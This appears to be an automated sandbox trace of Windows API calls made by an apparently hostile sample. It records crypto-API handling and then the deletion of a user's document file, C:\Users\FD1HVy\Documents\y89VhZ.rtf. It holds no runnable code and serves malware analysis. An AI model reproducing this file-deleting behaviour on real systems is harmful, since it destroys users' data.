0 [0268.314] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e550a8 [0268.314] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e55078 [0268.314] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55078 | out: hHeap=0x970000) returned 1 [0268.314] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e550a8 | out: hHeap=0x970000) returned 1 [0268.314] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e78b28 | out: hHeap=0x970000) returned 1 [0268.314] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51700 | out: hHeap=0x970000) returned 1 [0268.314] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54f48 [0268.314] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x18) returned 0x2e699a8 [0268.314] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e699a8 | out: hHeap=0x970000) returned 1 [0268.314] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f48 | out: hHeap=0x970000) returned 1 [0268.314] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55068 | out: hHeap=0x970000) returned 1 [0268.314] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x38) returned 0x2e775c8 [0268.314] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0268.314] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51838 [0268.314] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51880 [0268.314] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54fc8 [0268.315] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x30) returned 0x2e55ca8 [0268.315] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e55088 [0268.315] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0268.315] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55ca8 | out: hHeap=0x970000) returned 1 [0268.315] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55088 | out: hHeap=0x970000) returned 1 [0268.315] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e51628 [0268.315] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x40) returned 0x2e78a50 [0268.315] PeekMessageW (in: lpMsg=0x8cf138, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf138) returned 0 [0268.315] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54fd8 [0268.315] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e550d8 [0268.315] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e550d8 | out: hHeap=0x970000) returned 1 [0268.315] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54fd8 | out: hHeap=0x970000) returned 1 [0268.315] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e78a50 | out: hHeap=0x970000) returned 1 [0268.315] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51628 | out: hHeap=0x970000) returned 1 [0268.315] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54fc8 | out: hHeap=0x970000) returned 1 [0268.315] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51730 [0268.315] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e55048 [0268.315] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51898 [0268.315] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55048 | out: hHeap=0x970000) returned 1 [0268.315] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51700 [0268.315] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e55078 [0268.315] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51628 [0268.315] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55078 | out: hHeap=0x970000) returned 1 [0268.315] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51658 [0268.315] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e550c8 [0268.315] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e516a0 [0268.315] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e550c8 | out: hHeap=0x970000) returned 1 [0268.315] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e543c8 [0268.316] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51838 | out: hHeap=0x970000) returned 1 [0268.316] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51838 [0268.316] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e55108 [0268.316] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e542b0 [0268.316] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54f58 [0268.316] CharUpperBuffW (in: lpsz="__CRYPT_CONTEXT", cchLength=0xf | out: lpsz="__CRYPT_CONTEXT") returned 0xf [0268.316] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e542b0 | out: hHeap=0x970000) returned 1 [0268.316] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f58 | out: hHeap=0x970000) returned 1 [0268.316] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e51b08 [0268.316] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x40) returned 0x2e78a50 [0268.316] PeekMessageW (in: lpMsg=0x8cf138, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf138) returned 0 [0268.316] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e55028 [0268.316] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54f28 [0268.316] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f28 | out: hHeap=0x970000) returned 1 [0268.316] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55028 | out: hHeap=0x970000) returned 1 [0268.316] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e78a50 | out: hHeap=0x970000) returned 1 [0268.316] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51b08 | out: hHeap=0x970000) returned 1 [0268.316] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55108 | out: hHeap=0x970000) returned 1 [0268.316] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51910 [0268.316] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54f88 [0268.316] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51a60 [0268.316] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f88 | out: hHeap=0x970000) returned 1 [0268.316] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e518c8 [0268.316] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e55048 [0268.316] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55048 | out: hHeap=0x970000) returned 1 [0268.316] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e55038 [0268.316] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51b20 [0268.316] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0268.317] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51ac0 [0268.317] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e550f8 [0268.317] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e55108 [0268.317] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51a30 [0268.317] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51ac0 | out: hHeap=0x970000) returned 1 [0268.317] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e550f8 | out: hHeap=0x970000) returned 1 [0268.317] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51a30 | out: hHeap=0x970000) returned 1 [0268.317] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55108 | out: hHeap=0x970000) returned 1 [0268.317] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51af0 [0268.317] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54f68 [0268.317] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51b80 [0268.317] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54f98 [0268.317] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54fa8 [0268.317] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51940 [0268.317] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51b80 | out: hHeap=0x970000) returned 1 [0268.317] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f98 | out: hHeap=0x970000) returned 1 [0268.317] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51940 | out: hHeap=0x970000) returned 1 [0268.317] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54fa8 | out: hHeap=0x970000) returned 1 [0268.317] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e550e8 [0268.317] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51a48 [0268.317] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54f18 [0268.317] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54f78 [0268.317] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51ad8 [0268.317] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51a48 | out: hHeap=0x970000) returned 1 [0268.317] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f18 | out: hHeap=0x970000) returned 1 [0268.317] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51ad8 | out: hHeap=0x970000) returned 1 [0268.317] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f78 | out: hHeap=0x970000) returned 1 [0268.317] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51b38 [0268.318] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e550c8 [0268.318] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptReleaseContext", cchWideChar=20, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 20 [0268.318] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x14) returned 0x2e699a8 [0268.318] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptReleaseContext", cchWideChar=20, lpMultiByteStr=0x2e699a8, cbMultiByte=20, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptReleaseContext", lpUsedDefaultChar=0x0) returned 20 [0268.318] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51b38 | out: hHeap=0x970000) returned 1 [0268.318] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e543f0 [0268.318] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e699a8 | out: hHeap=0x970000) returned 1 [0268.318] GetProcAddress (hModule=0x756e0000, lpProcName="CryptReleaseContext") returned 0x756ffbc0 [0268.318] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e543f0 | out: hHeap=0x970000) returned 1 [0268.318] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e550c8 | out: hHeap=0x970000) returned 1 [0268.318] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51bb0 [0268.318] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54f88 [0268.318] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54f58 [0268.318] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f88 | out: hHeap=0x970000) returned 1 [0268.318] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f58 | out: hHeap=0x970000) returned 1 [0268.318] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51bb0 | out: hHeap=0x970000) returned 1 [0268.318] CryptReleaseContext (hProv=0xa5f958, dwFlags=0x0) returned 1 [0268.318] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x214) returned 0x2f14488 [0268.318] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e51b80 [0268.318] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e55088 [0268.318] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51928 [0268.318] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51988 [0268.318] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51a78 [0268.319] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e55068 [0268.319] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51a78 | out: hHeap=0x970000) returned 1 [0268.319] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55068 | out: hHeap=0x970000) returned 1 [0268.319] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51988 | out: hHeap=0x970000) returned 1 [0268.319] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51940 [0268.319] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51a90 [0268.319] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51b08 [0268.319] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e55068 [0268.319] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51b08 | out: hHeap=0x970000) returned 1 [0268.319] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55068 | out: hHeap=0x970000) returned 1 [0268.319] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51a90 | out: hHeap=0x970000) returned 1 [0268.319] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51b08 [0268.319] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0268.319] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0268.320] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55ca8 | out: hHeap=0x970000) returned 1 [0268.320] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f88 | out: hHeap=0x970000) returned 1 [0268.320] PeekMessageW (in: lpMsg=0x8cf138, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf138) returned 0 [0268.320] FreeLibrary (hLibModule=0x756e0000) returned 1 [0268.320] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51a18 | out: hHeap=0x970000) returned 1 [0268.320] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51958 | out: hHeap=0x970000) returned 1 [0268.320] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0268.320] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e775c8 | out: hHeap=0x970000) returned 1 [0268.320] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0268.320] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e78858 | out: hHeap=0x970000) returned 1 [0268.320] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51748 | out: hHeap=0x970000) returned 1 [0268.320] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0268.320] CloseHandle (hObject=0x2d0) returned 1 [0268.320] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e518f8 | out: hHeap=0x970000) returned 1 [0268.320] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e78 | out: hHeap=0x970000) returned 1 [0268.320] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2f04008 | out: hHeap=0x970000) returned 1 [0268.322] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e77808 | out: hHeap=0x970000) returned 1 [0268.322] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e69b08 | out: hHeap=0x970000) returned 1 [0268.322] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51748 | out: hHeap=0x970000) returned 1 [0268.322] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51700 | out: hHeap=0x970000) returned 1 [0268.322] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51838 | out: hHeap=0x970000) returned 1 [0268.322] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51730 | out: hHeap=0x970000) returned 1 [0268.322] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51658 | out: hHeap=0x970000) returned 1 [0268.322] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51880 | out: hHeap=0x970000) returned 1 [0268.322] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e516a0 | out: hHeap=0x970000) returned 1 [0268.322] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51898 | out: hHeap=0x970000) returned 1 [0268.322] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e540f8 | out: hHeap=0x970000) returned 1 [0268.322] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0268.323] CloseHandle (hObject=0x2a0) returned 1 [0268.324] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e515f8 | out: hHeap=0x970000) returned 1 [0268.324] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ca8 | out: hHeap=0x970000) returned 1 [0268.325] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0268.326] PeekMessageW (in: lpMsg=0x8cf968, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf968) returned 0 [0268.326] GetEnvironmentVariableW (in: lpName="USERPROFILE", lpBuffer=0x8cf560, nSize=0x104 | out: lpBuffer="C:\\Users\\FD1HVy") returned 0xf [0268.326] GetFullPathNameW (in: lpFileName="C:\\Users\\FD1HVy\\Documents/y89VhZ.rtf", nBufferLength=0x104, lpBuffer=0x8cee18, lpFilePart=0x8cedf4 | out: lpBuffer="C:\\Users\\FD1HVy\\Documents\\y89VhZ.rtf", lpFilePart=0x8cedf4*="y89VhZ.rtf") returned 0x24 [0268.326] GetFileAttributesW (lpFileName="C:\\Users\\FD1HVy\\Documents\\y89VhZ.rtf" (normalized: "c:\\users\\fd1hvy\\documents\\y89vhz.rtf")) returned 0x20 [0268.326] FindFirstFileW (in: lpFileName="C:\\Users\\FD1HVy\\Documents\\y89VhZ.rtf", lpFindFileData=0x8cf028 | out: lpFindFileData=0x8cf028*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xf1c2ebe0, ftCreationTime.dwHighDateTime=0x1d5e242, ftLastAccessTime.dwLowDateTime=0xe8042a30, ftLastAccessTime.dwHighDateTime=0x1d5f073, ftLastWriteTime.dwLowDateTime=0xe8042a30, ftLastWriteTime.dwHighDateTime=0x1d5f073, nFileSizeHigh=0x0, nFileSizeLow=0x67fb, dwReserved0=0x1, dwReserved1=0x1c, cFileName="y89VhZ.rtf", cAlternateFileName="")) returned 0xa86f50 [0268.327] DeleteFileW (lpFileName="C:\\Users\\FD1HVy\\Documents\\y89VhZ.rtf" (normalized: "c:\\users\\fd1hvy\\documents\\y89vhz.rtf")) returned 1 [0268.337] FindNextFileW (in: hFindFile=0xa86f50, lpFindFileData=0x8cf028 | out: lpFindFileData=0x8cf028*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xf1c2ebe0, ftCreationTime.dwHighDateTime=0x1d5e242, ftLastAccessTime.dwLowDateTime=0xe8042a30, ftLastAccessTime.dwHighDateTime=0x1d5f073, ftLastWriteTime.dwLowDateTime=0xe8042a30, ftLastWriteTime.dwHighDateTime=0x1d5f073, nFileSizeHigh=0x0, nFileSizeLow=0x67fb, dwReserved0=0x1, dwReserved1=0x1c, cFileName="y89VhZ.rtf", cAlternateFileName="")) returned 0 [0268.337] FindClose (in: hFindFile=0xa86f50 | out: hFindFile=0xa86f50) returned 1 [0268.340] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54858 | out: hHeap=0x970000) returned 1 [0268.340] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54cd8 | out: hHeap=0x970000) returned 1 [0268.340] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51478 | out: hHeap=0x970000) returned 1 [0268.340] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e513b8 | out: hHeap=0x970000) returned 1 [0268.340] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e515b0 | out: hHeap=0x970000) returned 1 [0268.340] PeekMessageW (in: lpMsg=0x8cf968, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf968) returned 0 [0268.340] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e514f0 [0268.341] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51358 [0268.341] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54bc8 [0268.341] GetEnvironmentVariableW (in: lpName="USERPROFILE", lpBuffer=0x8cf560, nSize=0x104 | out: lpBuffer="C:\\Users\\FD1HVy") returned 0xf [0268.341] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e513b8 [0268.341] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e79310 [0268.341] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54cf8 [0268.341] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54c68 [0268.341] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x18) returned 0x2e69b08 [0268.341] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51478 [0268.341] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x70) returned 0x2e54858 [0268.341] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e79310 | out: hHeap=0x970000) returned 1 [0268.341] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51478 | out: hHeap=0x970000) returned 1 [0268.341] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e515b0 [0268.341] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e515b0 | out: hHeap=0x970000) returned 1 [0268.341] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54bd8 [0268.341] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54bd8 | out: hHeap=0x970000) returned 1 [0268.341] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51478 [0268.341] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51478 | out: hHeap=0x970000) returned 1 [0268.341] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e69b08 | out: hHeap=0x970000) returned 1 [0268.341] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54c68 | out: hHeap=0x970000) returned 1 [0268.341] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54bc8 | out: hHeap=0x970000) returned 1 [0268.341] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e515b0 [0268.341] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54bc8 [0268.341] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54bc8 | out: hHeap=0x970000) returned 1 [0268.341] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4a) returned 0x2e558d8 [0268.341] GetFullPathNameW (in: lpFileName="C:\\Users\\FD1HVy\\Documents/y89VhZ.rtf", nBufferLength=0x104, lpBuffer=0x8cf65c, lpFilePart=0x8cf650 | out: lpBuffer="C:\\Users\\FD1HVy\\Documents\\y89VhZ.rtf", lpFilePart=0x8cf650*="y89VhZ.rtf") returned 0x24 [0268.341] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e558d8 | out: hHeap=0x970000) returned 1 [0268.342] GetFileAttributesW (lpFileName="C:\\Users\\FD1HVy\\Documents\\y89VhZ.rtf" (normalized: "c:\\users\\fd1hvy\\documents\\y89vhz.rtf")) returned 0xffffffff [0268.342] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54858 | out: hHeap=0x970000) returned 1 [0268.342] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54cf8 | out: hHeap=0x970000) returned 1 [0268.342] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e513b8 | out: hHeap=0x970000) returned 1 [0268.342] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51358 | out: hHeap=0x970000) returned 1 [0268.342] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e515b0 | out: hHeap=0x970000) returned 1 [0268.342] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e514f0 | out: hHeap=0x970000) returned 1 [0268.342] PeekMessageW (in: lpMsg=0x8cf968, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf968) returned 0 [0268.342] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e77788 | out: hHeap=0x970000) returned 1 [0268.342] PeekMessageW (in: lpMsg=0x8cf968, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf968) returned 0 [0268.342] PeekMessageW (in: lpMsg=0x8cf968, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf968) returned 0 [0268.342] 